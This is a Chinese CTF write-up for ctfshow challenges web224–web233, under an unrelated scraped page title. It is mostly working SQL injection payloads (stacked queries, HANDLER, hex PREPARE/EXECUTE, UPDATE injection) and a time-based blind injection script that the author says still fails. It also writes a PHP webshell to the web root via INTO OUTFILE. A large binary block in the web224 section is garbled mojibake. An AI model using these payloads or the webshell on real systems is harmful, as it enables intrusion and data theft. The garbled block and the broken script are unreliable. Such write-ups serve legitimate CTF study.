如何用电子邮箱做网站网站企业备案

当前位置: 首页 > news >正文

如何用电子邮箱做网站,网站企业备案,一个公司做两个网站的好处,中国4a广告公司100强web224 扫描后台#xff0c;发现robots.txt#xff0c;访问发现/pwdreset.php #xff0c;再访问可以重置密码 #xff0c;登录之后发现上传文件 检查发现没有限制诶 上传txt,png,zip发现文件错误了 后面知道群里有个文件能上传 ? $GET[1]?就是0x3c3f3d60245…web224 扫描后台发现robots.txt访问发现/pwdreset.php 再访问可以重置密码 登录之后发现上传文件 检查发现没有限制诶 上传txt,png,zip发现文件错误了 后面知道群里有个文件能上传 ? $GET[1]?就是0x3c3f3d60245f4745545b315d603f3e 所以访问1.php执行命令就行了 C64File );select 0x3c3f3d60245f4745545b315d603f3e into outfile /var/www/html/1.php;– 沁s寂dA?q?y黃抾|{9l惒1%╓m鯧幆v9?3#;mv诬磇S鏛5Dv镓Qj堜匒C?煕?乼ニo妻鷷?7n积寒遝e跞HO疜鸹M鳁^鴀亍o钏fH?5fmUe羰獞Q黁dS溄??喙瑙枴溓?{3Uo堊%?k?t饜〖.鲽|a?s?齁韱y;啑鼞?)yχ0]釵C燁L??H歩P?;F!?O??_铧J漅 Q4IQ糅酰仩Q澮Q4刷X秞燘硢枹竐蕱4猄!?Y癵G€ -帰E娾?Zg4猄!奦Y瘷歯€ ?帰U娾?gl%hT?Bm?枱?ㄐ︶(冥(?1vA???#媌??F肣寫?c#A?チQ尣(??R鑭??泞[痢嶊擣?媌Z?燘N肣浃(辎F?hT?ByY譯U€ y G憲淰滲楔Ni? ??鸈≒衟鞭M狸5??Ey飂?S-≒媒胼d?侳i猖瘔畂萺淓d齙嬥?v膽~?8~鷙?6駨幆F脍??}?狊橦W?F8rQ?晴?lt⑥l涌込?珤豉cu?|??}0暹胙齑鈝?m?鞿]}睨骃闦v澌U殠鮵驥熶鷘?v(Q鍌迲I(q??(O∵鶱邖欕鯱琀NX}?氕?S鐔m諫_緌踌ü獬炉謉O貔(遞棚矶蛧餠 GF蟧ホ魾?j0襪瀝xCau僇疓E\(4顖同(T厷\)∷n艶 圮篘a瘸?斠58犊/醡?z4聝(簸畊sC3n髎#懏蹲 巌麀\(?攧琳Cp韔Od嶙_羗~n8??y 盇曣 (刏^蹼?▲??Bv偁L 增L偶j jU漫攭*??働鏝?o棟挔* (3#?_?Bm烧賟B-^殩AY→?AYAo??R|繠檬?B貮ㄟG賟B5]HM厾l孭5~T5 悴詘?*F*嵙牰w啝8#HU県?穊骊睻U⑶Z?拟瑋咖D淲违JX慍??F?|e揈湑{KX藪摽 睌飖w 矩]X.b吙b)哽頧羃A,鴍?蛶[k闽,寤???_钯?旄扁\)?睌oww巨??q?UJX??b)唢頧?b??;nE,蠊 栻 飵鮦7锯x謳[玭謮,K鶐w荍 膫/yn?砀盕敭?b鞭驈v砆鴸咻埑返^玛}鰃:蕑??膫o壠F軍X;蚬 ??c练黖F軍Xo?腞惧#P唘4膔k踷Ⅺじ^,v巐╫/z.骔#c#k詴徲{簐潭C棧?臜澆鱘X€盠J瞢碷l??谨?崌g虓k??谨???3Ot?N记2唵:馊茌7k貊;猡\(u?7俾衊KI}]?魋b繆??a?L篃?aI榬OLK绿?寰殩刌\)a式9- 矹聰鹻Zf搫)??,FgT?xT€肍?z暁拞蜁Q?5% 盯铏jJ6丏褀諗4l,嚔w?i貫EWS野??拨)}hMI弥4(z贇拞?P裘?嵡?姙害?E_^S野l劉矾i剷(7绥?曉籿d{鹦?纟f污韴C蚸p6寚?Z7?反{牯裠冇a铥銥楮R3n檞涕?外???E痌 N敿G?N锝(p8藑o?葶痌蕉s阤蓒,惠艮觾鉠嶑迺7qK粭M锝甩浣?C[陟蕞拮郥嶌N?zm_萅蓒艮?N暪?{③?V糈ダX蓒,惶艮xx跺糸脥弗軨轇p溗}??]裐ё\杫嚇辿恿?临V拊圼邶_z飴 腔荀r颜勄塣[?y廵w椶{Fp躃€厭烖?反{肤揠 巤癸脄纲榈?橑Xvf榻? 蘕?p低鼕右罨襸?淛毼啂l?螽*谨J纐0h鷄^撰弗?^!8(4E#珙嬎2飯襸oIO淖z荛颠擿蓿仫T鯺垾8?戴c-?絯8?_愇剃鍴xc?蝃?蔟坻坜霌S3柪擎絧pLP?V蕉?蓒?ы闃k f7癛郱既誾?]圇鰟芖甲 c)??\(掂V艮?乏€t痰??,(钢xm?戨蛣 掲B?憓審蛖臽)(??发鱲∽:鎆脜?XP p瓚?蒠M?y镳耍?|l匏5A敝H??发鼬Z8\) 0?顦閌RL?搾潣c?叹?儍PI?fX箼崇?茐x?an趞騷?{v谴€暃I1M趸饽sY笊?! C氷廀3皰3)鎯#倊賯[肠鳘r髱|P?衇?J罂V?5yqT鱽?vK帺鞠?Oq羏*(騎鮅#DQV朶W}R Q钠G(騟鮅#DQV枩[}R Q?e(騰鮅#DQV栜_}R Q膯??鮅#DQV?DKRM?湶?殥* (K-?Ge苍S殥**b┥4%U耪o攢RU蠩俆ye?\(敧?U灳滨gA┆O?R?铕厒敧??U?绝q翤PA俆y对渨?敧醠?蠔f觉磶蔺r5K眨p廟濖?騤謝枾NA? ?壣a锺锺锺镅犍摵? x 这东西好像和sql没关系哇 web225 这道题神似之前的某一道题闭合之后堆叠注入就行 但是直接在用户名写没有回显那就传参(先换到注入页面访问/api) 然后 ?username-1;show tables;-- 发现表ctfshow_flagasa 利用handler代替select ?username-1;handler ctfshow_flagasa open;handler ctfshow_flagasa read first;--web226 prepare用于预备一个语句并赋予名称以后可以引用该语句 execute执行语句 16进制绕过 -1;PREPARE abcd from 0x73686f772020646174616261736573;execute abcd;# show databases;-1;PREPARE abcd from 0x73686F77207461626C6573;execute abcd;# show tables;-1;PREPARE abcd from 0x73656C656374202A2066726F6D2063746673685F6F775F666C61676173;execute abcd;# select * from ctfsh_ow_flagasweb227 -1;PREPARE a from 0x73686F77207461626C6573;execute a;# show tables;-1;PREPARE a from 0x73656C656374202A2066726F6D2063746673686F775F75736572;execute a;# select * from ctfshow_user但是并没有发现flag 后面发现这里考察SQL存储使用 SELECT * FROM information_schema.Routines WHERE ROUTINE_NAME sp_name ; ROUTINE_NAME 字段中存储的是存储过程和函数的名称; sp_name 参数表示存储过程或函数的名称select * from information_schema.Routines -1;PREPARE a from 0x73656C656374202A2066726F6D20696E666F726D6174696F6E5F736368656D612E526F7574696E6573;execute a;#web228 select * from ctfsh_ow_flagasaa -1;PREPARE a from 0x73656C656374202A2066726F6D2063746673685F6F775F666C616761736161 ;execute a;#web229–web230 原理一样不过多赘述 16进制转码 web231 updata注入 update 注入 \)sql update ctfshow_user set pass {\(password} where username {\)username};;将表名为ctfshow_user 的password更新成我们传入的当username正确的时候注入成功 password-1,username(select group_concat(table_name) from information_schema.tables where table_schemadatabase())#usernamepassword-1,username(select group_concat(column_name) from information_schema.columns where table_nameflaga)#usernamepassword-1,username(select group_concat(flagas) from flaga)#usernameweb 232 \(sql update ctfshow_user set pass md5({\)password}) where username {\(username};;md5直接闭合 password),username(select group_concat(table_name) from information_schema.tables where table_schemadatabase())#usernamepassword),username(select group_concat(column_name) from information_schema.columns where table_nameflagaa)%23username1password),username(select group_concat(flagass) from flagaa)%23username1web 233 \)sql update ctfshow_user set pass {\(password} where username {\)username};; 不能传入单引号不过可以传入\这就有意思了。假设我们password传入\username传入,usernamedatabase()# 那么最终构成的语句如下 update ctfshow_user set pass \ where username ,usernamedatabase()# 等价于 执行SQL语句 update ctfshow_user set pass x,usernamedatabase()#password\username,username(select group_concat(table_name) from information_schema.tables where table_schemadatabase())#username1password\username,username(select group_concat(column_name) from information_schema.columns where table_nameflaga)#username1password\username,username(select group_concat(flagas) from flaga)#username1理论来说应该是有回显的但是我的一直没有只能盲注脚本了 Author:Y4tackerimport requestsurl http://52405488-688b-4d4e-92ee-34eb3d063698.challenge.ctf.show/api/?page1limit10result
i 0while 1:i i 1head 32tail 127while head tail:mid (head tail) 1# 查数据库# payload select group_concat(table_name) from information_schema.tables where table_schemadatabase()# 查表名# payload select column_name from information_schema.columns where table_nameflag233333 limit 1,1# 查数据payload select flagass233 from flag233333data {username: f1 or if(ascii(substr(({payload}),{i},1)){mid},sleep(0.05),1)#,password: 4}try:r requests.post(url, datadata, timeout0.9)tail midexcept Exception as e:head mid 1if head ! 32:result chr(head)else:breakprint(result)算了始终有问题我觉得还是后面再来吧我去学写脚本